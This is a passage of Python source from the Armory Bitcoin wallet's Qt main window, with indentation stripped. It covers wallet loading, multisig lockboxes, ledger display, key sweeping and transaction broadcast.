ratioPerWallet = 0
if len(wltPaths) > 0:
ratioPerWallet = 100 / float(len(wltPaths))
i = 0
for fpath in wltPaths:
currentProgress = float(i) * ratioPerWallet
updateProgress(currentProgress)
i += 1
def reportProgress(val):
updateProgress(currentProgress + val*ratioPerWallet)
try:
wltLoad = PyBtcWallet().readWalletFile(fpath, \
reportProgress=reportProgress)
wltID = wltLoad.uniqueIDB58
if fpath in wltExclude or wltID in wltExclude:
continue
wltLoaded = True
if wltID in self.walletIDSet:
LOGWARN('***WARNING: Duplicate wallet detected, %s', wltID)
wo1 = self.walletMap[wltID].watchingOnly
wo2 = wltLoad.watchingOnly
if wo1 and not wo2:
prevWltPath = self.walletMap[wltID].walletPath
self.walletMap[wltID] = wltLoad
LOGWARN('First wallet is more useful than the second one...')
LOGWARN(' Wallet 1 (loaded): %s', fpath)
LOGWARN(' Wallet 2 (skipped): %s', prevWltPath)
else:
wltLoaded = False
LOGWARN('Second wallet is more useful than the first one...')
LOGWARN(' Wallet 1 (skipped): %s', fpath)
LOGWARN(' Wallet 2 (loaded): %s', self.walletMap[wltID].walletPath)
else:
# Update the maps/dictionaries
self.walletMap[wltID] = wltLoad
self.walletIndices[wltID] = len(self.walletMap)-1
# Maintain some linear lists of wallet info
self.walletIDSet.add(wltID)
self.walletIDList.append(wltID)
wtype = determineWalletType(wltLoad, self)[0]
notWatch = (not wtype == WLTTYPES.WatchOnly)
defaultVisible = self.getWltSetting(wltID, 'LedgerShow', notWatch)
self.walletVisibleList.append(defaultVisible)
wltLoad.mainWnd = self
if wltLoaded is False:
continue
except:
LOGEXCEPT( '***WARNING: Wallet could not be loaded: %s (skipping)',
fpath)
#raise
LOGINFO('Number of wallets read in: %d', len(self.walletMap))
for wltID, wlt in self.walletMap.iteritems():
dispStr = (' Wallet (%s):' % wlt.uniqueIDB58).ljust(25)
dispStr += '"'+wlt.labelName.ljust(32)+'" '
dispStr += '(Encrypted)' if wlt.useEncryption else '(No Encryption)'
LOGINFO(dispStr)
# Create one wallet per lockbox to make sure we can query individual
# lockbox histories easily.
if self.usermode==USERMODE.Expert:
LOGINFO('Loading Multisig Lockboxes')
self.loadLockboxesFromFile(MULTISIG_FILE)
# Get the last directory
savedDir = self.settings.get('LastDirectory')
if len(savedDir)==0 or not os.path.exists(savedDir):
savedDir = ARMORY_HOME_DIR
self.lastDirectory = savedDir
self.writeSetting('LastDirectory', savedDir)
updateProgress(100)
self.loadCppWallets()
#############################################################################
def loadCppWallets(self):
#load all existing cpp wallets
if self.walletManager == None:
self.walletManager = Cpp.WalletManager(str(ARMORY_HOME_DIR))
#check python wallets against cpp wallets
from ui.WalletMirrorDialog import WalletComparisonClass
wltCmpObj = WalletComparisonClass(self)
wltCmpObj.checkWallets()
#load all cpp wallets
for wltID in self.walletMap:
wlt = self.walletMap[wltID]
wlt.cppWallet = self.walletManager.getCppWallet(wltID)
#############################################################################
@RemoveRepeatingExtensions
def getFileSave(self, title='Save Wallet File', \
ffilter=['Wallet files (*.wallet)'], \
defaultFilename=None):
LOGDEBUG('getFileSave')
startPath = self.settings.get('LastDirectory')
if len(startPath)==0 or not os.path.exists(startPath):
startPath = ARMORY_HOME_DIR
if not defaultFilename==None:
startPath = os.path.join(startPath, defaultFilename)
types = list(ffilter)
types.append('All files (*)')
typesStr = ';; '.join(str(_type) for _type in types)
# Open the native file save dialog and grab the saved file/path unless
# we're in OS X, where native dialogs sometimes freeze. Looks like a Qt
# issue of some sort. Some experimental code under ArmoryMac that directly
# calls a dialog produces better results but still freezes under some
# circumstances.
if not OS_MACOSX:
fullPath = unicode(QFileDialog.getSaveFileName(self, title, startPath,
typesStr))
else:
fullPath = unicode(QFileDialog.getSaveFileName(self, title, startPath,
typesStr,
options=QFileDialog.DontUseNativeDialog))
fdir,fname = os.path.split(fullPath)
if fdir:
self.writeSetting('LastDirectory', fdir)
return fullPath
#############################################################################
def getFileLoad(self, title='Load Wallet File', \
ffilter=['Wallet files (*.wallet)'], \
defaultDir=None):
LOGDEBUG('getFileLoad')
if defaultDir is None:
defaultDir = self.settings.get('LastDirectory')
if len(defaultDir)==0 or not os.path.exists(defaultDir):
defaultDir = ARMORY_HOME_DIR
types = list(ffilter)
types.append(self.tr('All files (*)'))
typeStr = QString("")
for i in range(0, len(types)):
_type = types[i]
typeStr += QString(_type)
if i < len(types) - 1:
typeStr += QString(";; ")
# Open the native file load dialog and grab the loaded file/path unless
# we're in OS X, where native dialogs sometimes freeze. Looks like a Qt
# issue of some sort. Some experimental code under ArmoryMac that directly
# calls a dialog produces better results but still freezes under some
# circumstances.
if not OS_MACOSX:
fullPath = unicode(QFileDialog.getOpenFileName(self, title, defaultDir,
typeStr))
else:
fullPath = unicode(QFileDialog.getOpenFileName(self, title, defaultDir,
typeStr,
options=QFileDialog.DontUseNativeDialog))
self.writeSetting('LastDirectory', os.path.split(fullPath)[0])
return fullPath
##############################################################################
def getWltSetting(self, wltID, propName, defaultValue=''):
# Sometimes we need settings specific to individual wallets -- we will
# prefix the setting name with the wltID.
wltPropName = 'Wallet_%s_%s' % (wltID, propName)
if self.settings.hasSetting(wltPropName):
return self.settings.get(wltPropName)
else:
if not defaultValue=='':
self.setWltSetting(wltID, propName, defaultValue)
return defaultValue
#############################################################################
def setWltSetting(self, wltID, propName, value):
wltPropName = 'Wallet_%s_%s' % (wltID, propName)
self.writeSetting(wltPropName, value)
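# e.g. setWltSetting(wltID, 'LedgerShow', True) is stored under the key
# 'Wallet_<wltID>_LedgerShow' and read back by getWltSetting() above.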
#############################################################################
def toggleIsMine(self, wltID):
alreadyMine = self.getWltSetting(wltID, 'IsMine')
if alreadyMine:
self.setWltSetting(wltID, 'IsMine', False)
else:
self.setWltSetting(wltID, 'IsMine', True)
#############################################################################
def loadLockboxesFromFile(self, fn):
self.allLockboxes = []
self.cppLockboxWltMap = {}
if not os.path.exists(fn):
return
lbList = readLockboxesFile(fn)
for lb in lbList:
self.updateOrAddLockbox(lb)
#############################################################################
def updateOrAddLockbox(self, lbObj, isFresh=False):
try:
lbID = lbObj.uniqueIDB58
index = self.lockboxIDMap.get(lbID)
if index is None:
# Add new lockbox to list
self.allLockboxes.append(lbObj)
self.lockboxIDMap[lbID] = len(self.allLockboxes)-1
else:
# Replace the original
self.allLockboxes[index] = lbObj
writeLockboxesFile(self.allLockboxes, MULTISIG_FILE)
except:
LOGEXCEPT('Failed to add/update lockbox')
#############################################################################
def removeLockbox(self, lbObj):
lbID = lbObj.uniqueIDB58
index = self.lockboxIDMap.get(lbID)
if index is None:
LOGERROR('Tried to remove lockbox that DNE: %s', lbID)
else:
del self.allLockboxes[index]
self.reconstructLockboxMaps()
writeLockboxesFile(self.allLockboxes, MULTISIG_FILE)
#############################################################################
def reconstructLockboxMaps(self):
self.lockboxIDMap.clear()
for i,box in enumerate(self.allLockboxes):
self.lockboxIDMap[box.uniqueIDB58] = i
#############################################################################
def getLockboxByID(self, boxID):
index = self.lockboxIDMap.get(boxID)
return None if index is None else self.allLockboxes[index]
################################################################################
# Return the lockbox if the p2shAddrStr is found in one of the lockboxes,
# otherwise return None
def getLockboxByP2SHAddrStr(self, p2shAddrStr):
for lboxId in self.lockboxIDMap.keys():
lbox = self.allLockboxes[self.lockboxIDMap[lboxId]]
if lbox.hasScrAddr(p2shAddrStr):
return lbox
return None
#############################################################################
def browseLockboxes(self):
self.lbDialog = DlgLockboxManager(self, self)
self.lbDialog.exec_()
self.lbDialog = None
#############################################################################
def getContribStr(self, binScript, contribID='', contribLabel=''):
"""
This is used to display info for the lockbox interface. It might also be
useful as a general script_to_user_string method, where you have a
binScript and you want to tell the user something about it. However,
it is verbose, so it won't necessarily fit in a send-confirm dialog.
We should extract as much information as possible without contrib*. This
at least guarantees that we see the correct data for our own wallets
and lockboxes, even if the data for other parties is incorrect.
"""
displayInfo = self.getDisplayStringForScript(binScript, 60, 2)
if displayInfo['WltID'] is not None:
return displayInfo['String'], ('WLT:%s' % displayInfo['WltID'])
elif displayInfo['LboxID'] is not None:
return displayInfo['String'], ('LB:%s' % displayInfo['LboxID'])
scriptType = getTxOutScriptType(binScript)
# At this point, we can use the contrib ID (and know we can't sign it)
if contribID or contribLabel:
if contribID:
if contribLabel:
outStr = self.tr('Contributor "%1" (%2)').arg(contribLabel, contribID)
else:
outStr = self.tr('Contributor %1').arg(contribID)
else:
if contribLabel:
outStr = self.tr('Contributor "%1"').arg(contribLabel)
else:
outStr = self.tr('Unknown Contributor')
LOGERROR('How did we get to this impossible else-statement?')
return outStr, ('CID:%s' % contribID)
# If no contrib ID, then salvage anything
astr = displayInfo['AddrStr']
cid = None
if scriptType == CPP_TXOUT_MULTISIG:
M,N,a160s,pubs = getMultisigScriptInfo(binScript)
dispStr = 'Unrecognized Multisig %d-of-%d: P2SH=%s' % (M,N,astr)
cid = 'MS:%s' % astr
elif scriptType == CPP_TXOUT_P2SH:
dispStr = 'Unrecognized P2SH: %s' % astr
cid = 'P2SH:%s' % astr
elif scriptType in CPP_TXOUT_HAS_ADDRSTR:
dispStr = 'Address: %s' % astr
cid = 'ADDR:%s' % astr
else:
dispStr = 'Non-standard: P2SH=%s' % astr
cid = 'NS:%s' % astr
return dispStr, cid
#############################################################################
def getWalletForAddr160(self, addr160):
for wltID, wlt in self.walletMap.iteritems():
if wlt.hasScrAddr(addr160):
return wltID
return ''
#############################################################################
def getWalletForScrAddr(self, scrAddr):
for wltID, wlt in self.walletMap.iteritems():
if wlt.hasScrAddr(scrAddr):
return wltID
return ''
#############################################################################
def getSettingOrSetDefault(self, settingName, defaultVal):
s = self.settings.getSettingOrSetDefault(settingName, defaultVal)
return s
#############################################################################
def writeSetting(self, settingName, val):
self.settings.set(settingName, val)
# NB: armoryd has a similar function (Armory_Daemon::start()), and both share
# common functionality in ArmoryUtils (finishLoadBlockchainCommon). If you
# mod this function, please be mindful of what goes where, and make sure
# any critical functionality makes it into armoryd.
def finishLoadBlockchainGUI(self):
# Let's populate the wallet info after finishing loading the blockchain.
self.setDashboardDetails()
self.memPoolInit = True
self.createCombinedLedger()
self.ledgerSize = len(self.combinedLedger)
self.statusBar().showMessage(self.tr('Blockchain loaded, wallets sync\'d!'), 10000)
currSyncSuccess = self.getSettingOrSetDefault("SyncSuccessCount", 0)
self.writeSetting('SyncSuccessCount', min(currSyncSuccess+1, 10))
if self.getSettingOrSetDefault('NotifyBlkFinish',True):
reply,remember = MsgBoxWithDNAA(self, self, MSGBOX.Info,
self.tr('Blockchain Loaded!'), self.tr('Blockchain loading is complete. '
'Your balances and transaction history are now available '
'under the "Transactions" tab. You can also send and '
'receive bitcoins.'), dnaaMsg=self.tr('Do not show me this notification again '), yesStr='OK')
if remember==True:
self.writeSetting('NotifyBlkFinish',False)
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Ledger)
self.netMode = NETWORKMODE.Full
self.settings.set('FailedLoadCount', 0)
# This will force the table to refresh with new data
self.removeBootstrapDat() # if we got here, we're *really* done with it
self.walletModel.reset()
qLen = self.delayedURIData['qLen']
if qLen > 0:
#delayed URI parses, feed them back to the uri parser now
for i in range(0, qLen):
uriStr = self.delayedURIData[qLen-i-1]
self.delayedURIData['qLen'] = qLen -i -1
self.uriLinkClicked(uriStr)
#############################################################################
def removeBootstrapDat(self):
bfile = os.path.join(BTC_HOME_DIR, 'bootstrap.dat.old')
if os.path.exists(bfile):
os.remove(bfile)
#############################################################################
def changeLedgerSorting(self, col, order):
"""
The direct sorting was implemented to avoid having to search for comment
information for every ledger entry. Therefore, you can't sort by comments
without getting them first, which is the original problem to avoid.
"""
if col in (LEDGERCOLS.NumConf, LEDGERCOLS.DateStr, \
LEDGERCOLS.Comment, LEDGERCOLS.Amount, LEDGERCOLS.WltName):
self.sortLedgCol = col
self.sortLedgOrder = order
self.createCombinedLedger()
#############################################################################
def createCombinedLedger(self, resetMainLedger=False):
"""
Create a ledger to display on the main screen, that consists of ledger
entries of any SUBSET of available wallets.
"""
bdmState = TheBDM.getState()
self.combinedLedger = []
totalFunds = 0
spendFunds = 0
unconfFunds = 0
if bdmState == BDM_BLOCKCHAIN_READY:
for wltID in self.wltIDList:
wlt = self.walletMap[wltID]
totalFunds += wlt.getBalance('Total')
spendFunds += wlt.getBalance('Spendable')
unconfFunds += wlt.getBalance('Unconfirmed')
self.ledgerSize = len(self.combinedLedger)
# Many MainWindow objects haven't been created yet...
# try to update them; an AttributeError here is re-raised so that
# setup-order problems are not hidden
try:
if bdmState in (BDM_OFFLINE, BDM_SCANNING):
self.lblTotalFunds.setText( '-'*12 )
self.lblSpendFunds.setText( '-'*12 )
self.lblUnconfFunds.setText('-'*12 )
return
uncolor = htmlColor('MoneyNeg') if unconfFunds>0 else htmlColor('Foreground')
btccolor = htmlColor('DisableFG') if spendFunds==totalFunds else htmlColor('MoneyPos')
lblcolor = htmlColor('DisableFG') if spendFunds==totalFunds else htmlColor('Foreground')
goodColor= htmlColor('TextGreen')
self.lblTotalFunds.setText('<b><font color="%s">%s</font></b>' % (btccolor,coin2str(totalFunds)))
self.lblTot.setText(self.tr('<b><font color="%1">Maximum Funds:</font></b>').arg(lblcolor))
self.lblBTC1.setText('<b><font color="%s">BTC</font></b>' % lblcolor)
self.lblSpendFunds.setText('<b><font color=%s>%s</font></b>' % (goodColor, coin2str(spendFunds)))
self.lblUnconfFunds.setText(('<b><font color="%s">%s</font></b>' % \
(uncolor, coin2str(unconfFunds))))
if resetMainLedger == False:
self.ledgerModel.reset()
else:
self.ledgerView.goToTop()
except AttributeError:
raise
if not self.usermode==USERMODE.Expert:
return
# In expert mode, we're updating the lockbox info, too
try:
self.lockboxLedgModel.reset()
except:
LOGEXCEPT('Failed to update lockbox ledger')
#############################################################################
def getCommentForLockboxTx(self, lboxId, le):
commentSet = set([])
lbox = self.allLockboxes[self.lockboxIDMap[lboxId]]
for a160 in lbox.a160List:
wltID = self.getWalletForAddr160(a160)
if wltID:
commentSet.add(self.walletMap[wltID].getCommentForLE(le))
return ' '.join(commentSet)
#############################################################################
def convertLedgerToTable(self, ledger, showSentToSelfAmt=True, wltIDIn=None):
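# Each row appended below follows this column order (see the appends further
# down): NumConf, UnixTime, Date string, signed amount string, wallet name,
# comment, amount, watch-only flag (isWatch), wallet/lockbox ID, tx hash,
# coinbase flag, sent-to-self flag, RBF flag, chained-ZC flag.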
table2D = []
datefmt = self.getPreferredDateFormat()
for le in ledger:
if wltIDIn is None:
wltID = le.getWalletID()
else:
wltID = wltIDIn
row = []
wlt = self.walletMap.get(wltID)
if wlt:
isWatch = (determineWalletType(wlt, self)[0] == WLTTYPES.WatchOnly)
wltName = wlt.labelName
dispComment = self.getCommentForLE(le, wltID)
else:
lboxId = wltID
lbox = self.getLockboxByID(lboxId)
if not lbox:
continue
isWatch = True
wltName = '%s-of-%s: %s (%s)' % (lbox.M, lbox.N, lbox.shortName, lboxId)
dispComment = self.getCommentForLockboxTx(lboxId, le)
nConf = TheBDM.getTopBlockHeight() - le.getBlockNum()+1
if le.getBlockNum()>=0xffffffff:
nConf=0
# If this was sent-to-self, we should display the actual value specified
# when the transaction was executed. This would be difficult if the
# "recipient" and "change" outputs were indistinguishable... but they
# are not, because we ALWAYS generate a new address for change, which
# means the change address MUST have a higher chain index
amt = le.getValue()
#if le.isSentToSelf() and wlt and showSentToSelfAmt:
#amt = determineSentToSelfAmt(le, wlt)[0]
# NumConf
row.append(nConf)
# UnixTime (needed for sorting)
row.append(le.getTxTime())
# Date
row.append(unixTimeToFormatStr(le.getTxTime(), datefmt))
# TxDir (actually just the amt... use the sign of the amt to determine dir)
row.append(coin2str(le.getValue(), maxZeros=2))
# Wlt Name
row.append(wltName)
# Comment
if le.isOptInRBF() == True:
if le.getValue() < 0 or le.isSentToSelf():
dispComment = self.tr("*Right click to bump fee* ") + dispComment
else:
dispComment = self.tr("*** RBF Flagged *** ") + dispComment
elif le.isChainedZC() == True:
dispComment = self.tr("*** Chained ZC *** ") + dispComment
row.append(dispComment)
# Amount
row.append(coin2str(amt, maxZeros=2))
# Is this money mine?
row.append(isWatch)
# ID to display (this might be the lockbox ID)
row.append( wltID )
# TxHash
row.append( binary_to_hex(le.getTxHash() ))
# Is this a coinbase/generation transaction
row.append( le.isCoinbase() )
# Sent-to-self
row.append( le.isSentToSelf() )
# RBF and zc chain status
row.append( le.isOptInRBF() )
row.append(le.isChainedZC())
# Finally, attach the row to the table
table2D.append(row)
return table2D
#############################################################################
def walletListChanged(self):
self.walletModel.reset()
self.populateLedgerComboBox()
self.changeWltFilter()
#############################################################################
def populateLedgerComboBox(self):
try:
comboIdx = self.comboWltSelect.currentIndex()
if comboIdx < 0:
raise
except:
comboIdx = self.getSettingOrSetDefault('LastFilterState', 0)
self.comboWltSelect.clear()
self.comboWltSelect.addItem( self.tr('My Wallets' ))
self.comboWltSelect.addItem( self.tr('Offline Wallets' ))
self.comboWltSelect.addItem( self.tr('Other\'s wallets' ))
self.comboWltSelect.addItem( self.tr('All Wallets' ))
self.comboWltSelect.addItem( self.tr('Custom Filter' ))
for wltID in self.walletIDList:
self.comboWltSelect.addItem( self.walletMap[wltID].labelName )
self.comboWltSelect.insertSeparator(5)
self.comboWltSelect.insertSeparator(5)
self.comboWltSelect.setCurrentIndex(comboIdx)
#############################################################################
def execDlgWalletDetails(self, index=None):
if len(self.walletMap)==0:
reply = QMessageBox.information(self, self.tr('No Wallets!'),
self.tr('You currently do not have any wallets. Would you like to '
'create one, now?'), QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
return
if index==None:
index = self.walletsView.selectedIndexes()
if len(self.walletMap)==1:
self.walletsView.selectRow(0)
index = self.walletsView.selectedIndexes()
elif len(index)==0:
QMessageBox.warning(self, self.tr('Select a Wallet'), \
self.tr('Please select a wallet on the right, to see its properties.'), QMessageBox.Ok)
return
index = index[0]
wlt = self.walletMap[self.walletIDList[index.row()]]
dialog = DlgWalletDetails(wlt, self.usermode, self, self)
self.walletDialogDict[wlt.uniqueIDB58] = dialog
dialog.exec_()
if wlt.uniqueIDB58 in self.walletDialogDict:
del self.walletDialogDict[wlt.uniqueIDB58]
#############################################################################
def execClickRow(self, index=None):
row,col = index.row(), index.column()
if not col==WLTVIEWCOLS.Visible:
return
wltID = self.walletIDList[row]
currEye = self.walletVisibleList[row]
self.walletVisibleList[row] = not currEye
self.setWltSetting(wltID, 'LedgerShow', not currEye)
if TheBDM.getState()==BDM_BLOCKCHAIN_READY:
self.changeWltFilter()
#############################################################################
def updateTxCommentFromView(self, view):
index = view.selectedIndexes()[0]
row, col = index.row(), index.column()
currComment = str(view.model().index(row, LEDGERCOLS.Comment).data().toString())
wltID = str(view.model().index(row, LEDGERCOLS.WltID ).data().toString())
txHash = str(view.model().index(row, LEDGERCOLS.TxHash ).data().toString())
if not currComment:
dialog = DlgSetComment(self, self, currComment, self.tr('Add Transaction Comment'))
else:
dialog = DlgSetComment(self, self, currComment, self.tr('Change Transaction Comment'))
if dialog.exec_():
newComment = str(dialog.edtComment.text())
view.model().updateIndexComment(index, newComment)
self.walletMap[wltID].setComment(hex_to_binary(txHash), newComment)
self.walletListChanged()
#############################################################################
def updateAddressCommentFromView(self, view, wlt):
index = view.selectedIndexes()[0]
row, col = index.row(), index.column()
currComment = str(view.model().index(row, ADDRESSCOLS.Comment).data().toString())
addrStr = str(view.model().index(row, ADDRESSCOLS.Address).data().toString())
if not currComment:
dialog = DlgSetComment(self, self, currComment, self.tr('Add Address Comment'))
else:
dialog = DlgSetComment(self, self, currComment, self.tr('Change Address Comment'))
if dialog.exec_():
newComment = str(dialog.edtComment.text())
atype, addr160 = addrStr_to_hash160(addrStr)
if atype==P2SHBYTE:
LOGWARN('Setting comment for P2SH address: %s' % addrStr)
wlt.setComment(addr160, newComment)
#############################################################################
def getAddrCommentIfAvailAll(self, txHash):
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
return ''
else:
appendedComments = []
for wltID,wlt in self.walletMap.iteritems():
cmt = wlt.getAddrCommentIfAvail(txHash)
if len(cmt)>0:
appendedComments.append(cmt)
return '; '.join(appendedComments)
#############################################################################
def getCommentForLE(self, le, wltID=None):
# Smart comments for LedgerEntry objects: get any direct comments ...
# if none, then grab the one for any associated addresses.
if wltID is None:
wltID = le.getWalletID()
return self.walletMap[wltID].getCommentForLE(le)
#############################################################################
def addWalletToApplication(self, newWallet, walletIsNew=False):
LOGINFO('addWalletToApplication')
# Update the maps/dictionaries
newWltID = newWallet.uniqueIDB58
if self.walletMap.has_key(newWltID):
return
self.walletMap[newWltID] = newWallet
self.walletIndices[newWltID] = len(self.walletMap)-1
# Maintain some linear lists of wallet info
self.walletIDSet.add(newWltID)
self.walletIDList.append(newWltID)
self.loadCppWallets()
newWallet.registerWallet(walletIsNew)
showByDefault = (determineWalletType(newWallet, self)[0] != WLTTYPES.WatchOnly)
self.walletVisibleList.append(showByDefault)
self.setWltSetting(newWltID, 'LedgerShow', showByDefault)
self.walletListChanged()
self.mainWnd = self
#############################################################################
def removeWalletFromApplication(self, wltID):
LOGINFO('removeWalletFromApplication')
idx = -1
try:
idx = self.walletIndices[wltID]
except KeyError:
LOGERROR('Invalid wallet ID passed to "removeWalletFromApplication"')
raise WalletExistsError
#self.walletMap[wltID].unregisterWallet()
del self.walletMap[wltID]
del self.walletIndices[wltID]
self.walletIDSet.remove(wltID)
del self.walletIDList[idx]
del self.walletVisibleList[idx]
# Reconstruct walletIndices
for i,wltID in enumerate(self.walletIDList):
self.walletIndices[wltID] = i
self.walletListChanged()
#############################################################################
def RecoverWallet(self):
DlgWltRecoverWallet(self, self).promptWalletRecovery()
#############################################################################
def createSweepAddrTx(self, sweepFromAddrObjList, sweepToScript):
"""
This method takes a list of addresses (likely just created from private
key data), finds all their unspent TxOuts, and creates a signed tx that
transfers 100% of the funds to the sweepTO160 address. It doesn't
actually execute the transaction, but it will return a broadcast-ready
PyTx object that the user can confirm. TxFee is automatically calc'd
and deducted from the output value, if necessary.
"""
LOGINFO('createSweepAddrTx')
if not isinstance(sweepFromAddrObjList, (list, tuple)):
sweepFromAddrObjList = [sweepFromAddrObjList]
addr160List = [a.getAddr160() for a in sweepFromAddrObjList]
utxoList = getUnspentTxOutsForAddr160List(addr160List)
if len(utxoList)==0:
return [None, 0, 0]
outValue = sumTxOutList(utxoList)
inputSide = []
for utxo in utxoList:
# The PyCreateAndSignTx method requires PyTx and PyBtcAddress objects
rawTx = TheBDM.bdv().getTxByHash(utxo.getTxHash()).serialize()
a160 = CheckHash160(utxo.getRecipientScrAddr())
for aobj in sweepFromAddrObjList:
if a160 == aobj.getAddr160():
pubKey = aobj.binPublicKey65.toBinStr()
pubKeyMap = {}
pubKeyMap[ADDRBYTE + a160] = pubKey
txoIdx = utxo.getTxOutIndex()
inputSide.append(UnsignedTxInput(rawTx, txoIdx, None, pubKeyMap))
break
minFee = calcMinSuggestedFees(utxoList, outValue, 0, 1)
if minFee > 0:
LOGDEBUG( 'Subtracting fee from Sweep-output')
outValue -= minFee
if outValue<=0:
return [None, outValue, minFee]
# Creating the output list is pretty easy...
outputSide = []
outputSide.append(DecoratedTxOut(sweepToScript, outValue))
try:
# Make copies, destroy them in the finally clause
privKeyMap = {}
for addrObj in sweepFromAddrObjList:
scrAddr = ADDRBYTE + addrObj.getAddr160()
privKeyMap[scrAddr] = addrObj.binPrivKey32_Plain.copy()
pytx = PyCreateAndSignTx(inputSide, outputSide, privKeyMap)
return (pytx, outValue, minFee)
finally:
for scraddr in privKeyMap:
privKeyMap[scraddr].destroy()
#############################################################################
def confirmSweepScan(self, pybtcaddrList, targAddr160):
LOGINFO('confirmSweepScan')
gt1 = len(self.sweepAfterScanList)>1
if len(self.sweepAfterScanList) > 0:
QMessageBox.critical(self, self.tr('Already Sweeping'),
self.tr('You are already in the process of scanning the blockchain for '
'the purposes of sweeping other addresses. You cannot initiate '
'sweeping new addresses until the current operation completes. '
'<br><br>'
'In the future, you may select "Multiple Keys" when entering '
'addresses to sweep. There is no limit on the number that can be '
'specified, but they must all be entered at once.'), QMessageBox.Ok)
# Destroy the private key data
for addr in pybtcaddrList:
addr.binPrivKey32_Plain.destroy()
return False
confirmed=False
if TheBDM.getState() in (BDM_OFFLINE, BDM_UNINITIALIZED):
#LOGERROR('Somehow ended up at confirm-sweep while in offline mode')
#QMessageBox.info(self, 'Armory is Offline', \
#'Armory is currently in offline mode. You must be in online '
#'mode to initiate the sweep operation.')
nkey = len(self.sweepAfterScanList)
strPlur = self.tr('addresses') if nkey>1 else self.tr('address')
QMessageBox.information(self, self.tr('Armory is Offline'), \
self.tr('You have chosen to sweep %n key(s), but Armory is currently '
'in offline mode. The sweep will be performed the next time you '
'go into online mode. You can initiate online mode (if available) '
'from the dashboard in the main window.', "", nkey), QMessageBox.Ok)
confirmed=True
else:
msgConfirm = ( \
self.tr('Armory must scan the global transaction history in order to '
'find any bitcoins associated with the keys you supplied. '
'Armory will go into offline mode temporarily while the scan '
'is performed, and you will not have access to balances or be '
'able to create transactions. The scan may take several minutes.'
'<br><br>', "", len(self.sweepAfterScanList)))
if TheBDM.getState()==BDM_SCANNING:
msgConfirm += ( \
self.tr('There is currently another scan operation being performed. '
'Would you like to start the sweep operation after it completes? '))
elif TheBDM.getState()==BDM_BLOCKCHAIN_READY:
msgConfirm += ( \
self.tr('<b>Would you like to start the scan operation right now?</b>'))
msgConfirm += (self.tr('<br><br>Clicking "No" will abort the sweep operation'))
confirmed = QMessageBox.question(self, self.tr('Confirm Rescan'), msgConfirm, \
QMessageBox.Yes | QMessageBox.No)
if confirmed==QMessageBox.Yes:
for addr in pybtcaddrList:
TheBDM.registerImportedScrAddr(Hash160ToScrAddr(addr.getAddr160()))
self.sweepAfterScanList = pybtcaddrList
self.sweepAfterScanTarg = targAddr160
self.setDashboardDetails()
return True
#############################################################################
def finishSweepScan(self, wlt, sweepList, sweepAfterScanTarget):
LOGINFO('finishSweepScan')
self.sweepAfterScanList = []
#######################################################################
# The createSweepAddrTx method will return instantly because the blockchain
# has already been rescanned, as described above
targScript = scrAddr_to_script(ADDRBYTE + sweepAfterScanTarget)
finishedTx, outVal, fee = self.createSweepAddrTx(sweepList, targScript)
gt1 = len(sweepList)>1
if finishedTx==None:
if (outVal,fee)==(0,0):
QMessageBox.critical(self, self.tr('Nothing to do'), \
self.tr('The private key(s) you have provided do not appear to contain '
'any funds. There is nothing to sweep.', "", len(sweepList)), \
QMessageBox.Ok)
return
else:
pladdr = (self.tr('addresses') if gt1 else self.tr('address'))
QMessageBox.critical(self, self.tr('Cannot sweep'),\
self.tr('You cannot sweep the funds from the address(es) you specified because '
'the transaction fee would be greater than or equal to the amount '
'swept. '
'<br><br> '
'<b>Balance of address(es):</b> %1<br> '
'<b>Fee to sweep address(es):</b> %2 '
'<br><br>The sweep operation has been canceled.', "", len(sweepList)).arg(coin2str(outVal+fee,maxZeros=0), coin2str(fee,maxZeros=0)), \
QMessageBox.Ok)
LOGERROR('Sweep amount (%s) is less than fee needed for sweeping (%s)', \
coin2str(outVal+fee, maxZeros=0), coin2str(fee, maxZeros=0))
return
# Finally, if we got here, we're ready to broadcast!
if gt1:
dispIn = self.tr('multiple addresses')
else:
addrStr = hash160_to_addrStr(sweepList[0].getAddr160())
dispIn = self.tr('address <b>%1</b>').arg(addrStr)
dispOut = self.tr('wallet <b>"%1"</b> (%2) ').arg(wlt.labelName, wlt.uniqueIDB58)
if DlgVerifySweep(dispIn, dispOut, outVal, fee).exec_():
self.broadcastTransaction(finishedTx, dryRun=False)
#############################################################################
def notifyNewZeroConf(self, leVec):
'''
Function that looks at an incoming zero-confirmation transaction queue and
determines if any incoming transactions were created by Armory. If so, the
transaction will be passed along to a user notification queue.
'''
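# Each queued entry is a [walletID, ledgerEntry, notifiedYet] triple; the
# final flag starts out False and is presumably flipped once the
# system-tray notification has actually been shown.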
vlen = leVec.size()
for i in range(0, vlen):
notifyIn = self.getSettingOrSetDefault('NotifyBtcIn', \
not OS_MACOSX)
notifyOut = self.getSettingOrSetDefault('NotifyBtcOut', \
not OS_MACOSX)
le = leVec[i]
if (le.getValue() <= 0 and notifyOut) or \
(le.getValue() > 0 and notifyIn):
self.notifyQueue.append([le.getWalletID(), le, False])
self.doTheSystemTrayThing()
#############################################################################
def broadcastTransaction(self, pytx, dryRun=False):
if dryRun:
#DlgDispTxInfo(pytx, None, self, self).exec_()
return
else:
LOGRAWDATA(pytx.serialize(), logging.INFO)
LOGPPRINT(pytx, logging.INFO)
newTxHash = binary_to_hex(pytx.getHash())
self.broadcasting[newTxHash] = pytx
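# Keep a reference to the outgoing tx so that zcBroadcastError() can
# retry it through the node RPC if the P2P broadcast fails or times out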
try:
LOGINFO('Sending Tx, %s', newTxHash)
TheBDM.bdv().broadcastZC(pytx.serialize())
except:
QMessageBox.warning(self, self.tr('Broadcast failed'), self.tr(
'The broadcast process failed unexpectedly. Report this error to '
'the development team if this issue occurs repeatedly.'), QMessageBox.Ok)
#############################################################################
def zcBroadcastError(self, txHash, errorMsg):
try:
pytx = self.broadcasting[txHash]
except:
return
LOGINFO("Failed to broadcast Tx through P2P")
isTimeoutError = False
errorMsgFromRPC = None
if errorMsg.startswith("tx broadcast timed out"):
isTimeoutError = True
try:
errorMsgFromRPC = TheBDM.bdv().broadcastThroughRPC(pytx.serialize())
if errorMsgFromRPC == "success":
QMessageBox.warning(self, self.tr('Transaction Broadcast'), self.tr(
'Your transaction failed to broadcast through the P2P layer but '
'was successfully broadcast through the RPC. This can be a symptom '
'of bad node connectivity to the Bitcoin network, or that your '
'node is overwhelmed by network traffic. If you consistently get '
'this warning, report to the developers for assistance with node '
'maintenance.'),
QMessageBox.Ok)
return
except:
LOGERROR("Node RPC is disabled")
